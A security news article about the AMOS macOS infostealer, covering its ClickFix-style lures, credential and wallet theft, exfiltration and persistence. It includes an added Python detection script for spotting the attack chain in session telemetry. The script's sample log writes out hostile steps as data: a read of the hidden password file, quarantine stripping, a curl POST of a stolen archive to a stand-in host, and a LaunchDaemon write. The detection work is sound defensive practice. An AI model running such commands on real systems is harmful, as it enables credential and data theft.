- AMOS relies on users executing malicious terminal commands themselves
- Sophos MDR identified ClickFix-like social engineering in macOS attacks
- Half of the macOS theft reports involved AMOS, but Apple is fighting back
Atomic macOS Stealer, also known as AMOS, is a persistent macOS security threat because it does not need sophisticated zero-day vulnerabilities to compromise Apple devices.
Instead, this malware family repeatedly exploits common user behavior by tricking users into typing a single command into their own Terminal application.
A recent incident investigated by Sophos MDR teams revealed exactly this pattern: a ClickFix-like ruse persuaded a victim to manually execute a malicious line of code.
AMOS uses psychological manipulation over technical exploits
This approach has become increasingly prominent, with researchers noticing similar social engineering tactics in several macOS infostealer campaigns throughout 2025 and early 2026.
AMOS accounted for nearly 40% of all macOS protection updates deployed by Sophos in 2025, more than doubling the detection rate of any other macOS malware family during the same period.
Furthermore, nearly half of all customer reports of macOS data theft in the past three months involved AMOS or one of its close variants.
Security firms have been tracking this malware-as-a-service operation since at least April 2023, with notable campaigns including a variant called SHAMOS reported by CrowdStrike in August 2025.
In December 2025, Huntress documented infections spreading through poisoned search results related to ChatGPT and Grok conversations.
How the malware harvests passwords and data
After the initial Terminal command executes a bootstrapping script, the malware immediately prompts the user for their macOS system password.
The malicious code then validates this credential locally using a simple directory services command before storing it in a hidden file named .pass in the user’s home directory.
Once the password is secured, AMOS downloads a secondary payload that strips extended attributes to bypass macOS security warnings.
The stealer also checks whether it is running inside a virtual machine or sandbox by querying system_profiler output for indicators such as QEMU, VMware or KVM.
The malware then proceeds to harvest a wide variety of sensitive information, including the macOS keychain database, browser credentials from Firefox and Chrome, extension storage files, and local session tokens.
Some variants also deploy fake Ledger Wallet and Trezor Suite applications designed to steal cryptocurrency wallet seeds and credentials.
All collected files are compressed into a single archive using the ditto tool before being transferred to attacker-controlled servers via curl POST requests.
To maintain long-term access, the malware installs a LaunchDaemon that ensures automatic execution after each system reboot.
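As an added example (not from the article, Sophos or Apple), the script below correlates per-session process telemetry against the stages just described: extended-attribute stripping, the system_profiler VM check, the hidden .pass file, the ditto archive, the curl POST and the LaunchDaemon write. Each command is ordinary on its own, so it alerts only when several stages land in one session within a short window; the log format, session ids and paths are assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta
import re

# One regex per stage the article describes; a single hit is benign, several in one session within minutes is not.
STAGES = {
    "strip_xattr": re.compile(r"\bxattr\s+(?:-c|-d\s+com\.apple\.quarantine)\b"),
    "vm_check":    re.compile(r"\bsystem_profiler\b"),
    "hidden_pass": re.compile(r"(?:^|[\s/])\.pass(?:\s|$)"),
    "archive":     re.compile(r"\bditto\s+-c\b"),
    "exfil_post":  re.compile(r"\bcurl\b.*(?:-X\s*POST|--data|\s-d\s|\s-F\s)"),
    "persistence": re.compile(r"/Library/LaunchDaemons/"),
}

def parse_event(line):
    """'ISO-timestamp<TAB>session<TAB>command line' -> (datetime, session, cmd)."""
    ts, session, cmd = line.split("\t", 2)
    return datetime.fromisoformat(ts), session, cmd

def classify(cmd):
    """Names of the stages whose pattern matches a single command line."""
    return {name for name, rx in STAGES.items() if rx.search(cmd)}

def detect(lines, window=timedelta(minutes=10), min_stages=3):
    """Return {session: sorted stages} for sessions with >= min_stages distinct stages in one window."""
    hits = defaultdict(list)  # session -> [(timestamp, stage)]
    for line in lines:
        ts, session, cmd = parse_event(line)
        hits[session].extend((ts, stage) for stage in classify(cmd))
    alerts = {}
    for session, events in hits.items():
        events.sort()
        for i, (start, _) in enumerate(events):
            stages = {s for t, s in events[i:] if t - start <= window}
            if len(stages) >= min_stages:
                alerts[session] = sorted(stages)
                break
    return alerts

# Constructed telemetry (assumed format): tty001 is routine admin work, tty002 walks the whole chain in two minutes.
SAMPLE_LOG = [
    "2026-02-10T09:02:11\ttty001\txattr -c /Applications/Editor.app",
    "2026-02-10T10:30:00\ttty002\txattr -c /private/tmp/stage2",
    "2026-02-10T10:30:03\ttty002\tsystem_profiler SPHardwareDataType",
    "2026-02-10T10:30:04\ttty002\tcat /Users/alice/.pass",
    "2026-02-10T10:31:40\ttty002\tditto -c -k /Users/alice/.cache/out /private/tmp/out.zip",
    "2026-02-10T10:31:45\ttty002\tcurl -X POST -F file=@/private/tmp/out.zip https://example.invalid/up",
    "2026-02-10T10:32:00\ttty002\tcp /private/tmp/com.example.plist /Library/LaunchDaemons/",
]
```

Running `detect(SAMPLE_LOG)` flags only tty002; feeding it real endpoint telemetry in the same tab-separated shape is the only change needed to hunt across a fleet.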
Despite the seriousness of AMOS, it’s worth questioning whether security vendors are overestimating its novelty, given that infostealers have been targeting Windows systems for nearly two decades.
The malware’s heavy reliance on user consent – someone has to willingly paste and run a Terminal command – creates a significant barrier that tech-savvy users can easily avoid.
Furthermore, Apple’s ongoing improvements to Gatekeeper, XProtect and notarization requirements can render AMOS largely ineffective within a few operating system updates.
The real danger may lie less in AMOS itself and more in the unpleasant truth that no platform is immune to users who ignore basic security warnings.